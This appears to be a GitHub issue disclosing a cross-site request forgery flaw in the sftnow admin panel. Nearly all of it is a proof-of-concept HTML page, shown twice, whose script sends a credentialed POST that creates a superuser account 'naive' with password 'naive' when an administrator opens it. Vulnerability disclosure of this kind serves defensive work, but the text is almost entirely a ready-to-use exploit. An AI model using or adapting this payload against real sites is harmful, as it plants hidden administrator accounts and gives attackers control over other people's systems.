POC is following code which clicked by admin will generate a superuser account called "naive" whose password is also "naive". <html> <script> function AddUser() { var req = new XMLHttpRequest(); var data ="user_login=naive&user_pass=naive&user_email=admin%40qq.com&role_id%5B%5D=1"; req.onload = reqListener; req.open('post','http://host/sftnow-master/index.php?g=Admin&m=User&a=add_post',true); req.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); req.withCredentials = true; req.send(data); function reqListener() {}; } AddUser(); </script> </html>
The text was updated successfully, but these errors were encountered:
POC is following code which clicked by admin will generate a superuser account called "naive" whose password is also "naive".
<html><script>function AddUser(){var req = new XMLHttpRequest();var data ="user_login=naive&user_pass=naive&user_email=admin%40qq.com&role_id%5B%5D=1";req.onload = reqListener;req.open('post','http://host/sftnow-master/index.php?g=Admin&m=User&a=add_post',true);req.setRequestHeader("Content-Type","application/x-www-form-urlencoded");req.withCredentials = true;req.send(data);function reqListener() {};}AddUser();</script></html>The text was updated successfully, but these errors were encountered: